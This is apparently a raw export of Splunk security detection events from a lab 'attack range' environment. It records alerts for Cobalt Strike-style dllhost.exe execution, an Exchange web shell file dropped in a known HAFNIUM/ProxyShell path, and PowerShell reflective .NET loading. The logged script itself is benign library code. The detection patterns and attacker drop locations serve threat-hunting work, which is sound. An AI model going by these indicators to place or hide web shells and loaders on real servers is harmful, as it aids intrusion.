\"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5ef0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3090", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="3", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x2e1c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1bd4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x18cc", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1774", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664877600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664877600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="19552", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664877600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664877600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4c60", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664885359, search_name="ESCU - Detect Exchange Web Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\", \"T1190\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"file_name\", \"role\": [\"Victim\"], \"type\": \"File Name\"}]}", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", annotations.mitre_attack="T1190", dest="exchange01.attackrange.local", file_create_time="2022-10-04 10:54:10.057", file_name="elhpw.aspx", file_path="C:\\inetpub\\wwwroot\\aspnet_client\\elhpw.aspx", info_max_time="+Infinity", info_min_time="0.000", process_name="System", risk_message="A file - elhpw.aspx was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint exchange01.attackrange.local by user $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="81.0", savedsearch_description="The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", threat_object="elhpw.aspx", threat_object_type="file name" 1664884532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T10:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664884532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T10:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664884532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T10:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664884532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T10:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = 